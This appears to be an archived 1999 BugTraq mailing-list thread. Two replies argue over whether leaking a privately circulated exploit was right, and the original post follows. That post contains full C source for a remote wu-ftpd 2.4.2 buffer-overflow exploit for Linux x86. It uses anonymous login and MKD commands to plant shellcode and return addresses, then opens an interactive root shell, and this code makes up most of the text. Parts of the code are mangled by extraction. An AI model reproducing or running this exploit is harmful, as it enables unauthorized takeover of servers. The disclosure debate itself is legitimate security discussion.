ate: Tue, 23 Mar 1999 09:09:11 +0000 From: duke To: BUGTRAQ@netspace.org Subject: Re: ftp exploit hi, this code i wrote demonstrated a vulnerability that is already widely known, and as indicated in the comments is (was) private... there is nothing to be gained from posting this here and furthermore you have *NO* right to post code not written by you, and not given to you by the author, but by some third rate source. All posting it here does is put alot more servers at an unecessary risk. Maybe next time you should see if its ok with the author before giving it out. (sorry about the rant aleph1, others..) -duke --------------------------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 10:01:22 -0800 From: Aleph One To: BUGTRAQ@netspace.org Subject: Re: ftp exploit On Tue, Mar 23, 1999 at 09:09:11AM +0000, duke wrote: > hi, > > this code i wrote demonstrated a vulnerability that is already widely known, and as indicated in the comments is > (was) private... there is nothing to be gained from posting this here and furthermore you have *NO* right to post > code not written by you, and not given to you by the author, but by some third rate source. All posting it here does > is put alot more servers at an unecessary risk. > Maybe next time you should see if its ok with the author before giving it out. > > (sorry about the rant aleph1, others..) > -duke No apology required. But as it is obvious, regardless of whether you did not intended it to be private, the exploit has fallen into other hands. As this is the case, and its being used to exploit the vulnerability, everyone should have access to it, not just the hackers who are trading it. As everyone should know, if you want to keep something private keep it to yourself (and even then chances are someone will find out). -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 --------------------------------------------------------------------------------------------- Date: Mon, 22 Mar 1999 17:10:23 +0100 From: Pieter Nieuwenhuijsen To: BUGTRAQ@netspace.org Subject: ftp exploit /* THIS IS PRIVATE! DO NOT DISTRIBUTE!!!! PRIVATE! WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1) for linux x86 (redhat 5.2) by duke duke@viper.net.au BIG thanks to stran9er for alot of help with part of the shellcode! i fear stran9er, but who doesn't? !@$ :) Greets to: #!ADM, el8.org users, To exploit this remotely they need to have a directory you can have write privlidges to.. this is the argument.. you can also use this locally by specifying -l -p with the = your home directory or something..(must begin with '/') also alignment arg is how return address is aligned.. shouldnt need it, but if u do it should be between 0 and 3 It takes about 10 seconds after "logged in" so be patient. -duke */ #include #include #include #include #include #include //#include //#include #include #include #define RET 0xbfffa80f void logintoftp(); void sh(); void mkd(char *); int max(int, int); long getip(char *name); char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80" "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed" "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1" "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03" "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89" "\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd" "\x80\xe8\xac\xff\xff\xff"; char tmp[256]; char name[128], pass[128]; int sockfd; int main(int argc, char **argv) { char sendln[1024], recvln[4048], buf1[800], buf2[1000]; char *p, *q, arg, **fakeargv = (char **) malloc(sizeof(char *)*(argc + 1)); int len, offset = 0, i, align=0; struct sockaddr_in cli; if(argc < 3){ printf("usage: %s [-l name] [-p pass] [-a ] [-o offset]\n", argv[0]); exit(0); } for(i=0; i < argc; i++) { fakeargv[i] = (char *)malloc(strlen(argv[i]) + 1); strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1); } fakeargv[argc] = NULL; while((arg = getopt(argc,fakeargv,"l:p:a:o:")) != EOF){ switch(arg) { case 'l': strncpy(name,optarg,128); break; case 'p': strncpy(pass,optarg,128); break; case 'a': align=atoi(optarg); break; case 'o': offset=atoi(optarg); break; default: printf("usage: %s [-l name] [-p pass] [-a ] [-o offset]\n", argv[0]); exit(0); break; } } if(name[0] == 0) strcpy(name, "anonymous"); if(pass[0] == 0) strcpy(pass, "hi@blahblah.net"); bzero(&cli, sizeof(cli)); bzero(recvln, sizeof(recvln)); bzero(sendln, sizeof(sendln)); cli.sin_family = AF_INET; cli.sin_port = htons(21); cli.sin_addr.s_addr=getip(argv[1]); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((len = read(sockfd, recvln, sizeof(recvln))) > 0){ recvln[len] = '\0'; if(strchr(recvln, '\n') != NULL) break; } logintoftp(sockfd); printf("logged in.\n"); bzero(sendln, sizeof(sendln)); for(i=align; i<996; i+=4) *(long *)&buf2[i] = RET + offset; memcpy(buf2, "a", align); memset(buf1, 0x90, 800); memcpy(buf1, argv[2], strlen(argv[2])); mkd(argv[2]); p = &buf1[strlen(argv[2])]; q = &buf1[799]; *q = '\x0'; while(p <= q){ strncpy(tmp, p, 200); mkd(tmp); p+=200; } mkd(shellcode); mkd("bin"); mkd("sh"); p = &buf2[0]; q = &buf2[999]; while(p <= q){ strncpy(tmp, p, 250); mkd(tmp); p+=250; } sh(sockfd); close(sockfd); printf("finit.\n"); } void mkd(char *dir) { char snd[512], rcv[1024]; char blah[1024], *p; int n; struct timeval tv; fd_set fds; bzero(&tv, sizeof(tv)); tv.tv_usec=50; bzero(blah, sizeof(blah)); p = blah; for(n=0; n 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } return; } void logintoftp() { char snd[1024], rcv[1024]; int n; printf("logging in with %s: %s\n", name, pass); memset(snd, '\0', 1024); sprintf(snd, "USER %s\r\n", name); write(sockfd, snd, strlen(snd)); while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } memset(snd, '\0', 1024); sprintf(snd, "PASS %s\r\n", pass); write(sockfd, snd, strlen(snd)); while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } return; } void sh() { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(sockfd, snd, strlen(snd)); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = max(fileno(stdin), sockfd) + 1; select(maxfd, &rset, NULL, NULL, NULL); if(FD_ISSET(fileno(stdin), &rset)){ bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd)-2, stdin); write(sockfd, snd, strlen(snd)); } if(FD_ISSET(sockfd, &rset)){ bzero(rcv, sizeof(rcv)); if((n = read(sockfd, rcv, sizeof(rcv))) == 0){ printf("EOF.\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } fputs(rcv, stdout); } } } int max(int x, int y) { if(x > y) return(x); return(y); } long getip(char *name) { struct hostent *hp; long ip; if ((ip=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { fprintf(stderr,"Can't resolve host.\n"); exit (1); } memcpy(&ip, (hp->h_addr), 4); } return ip; }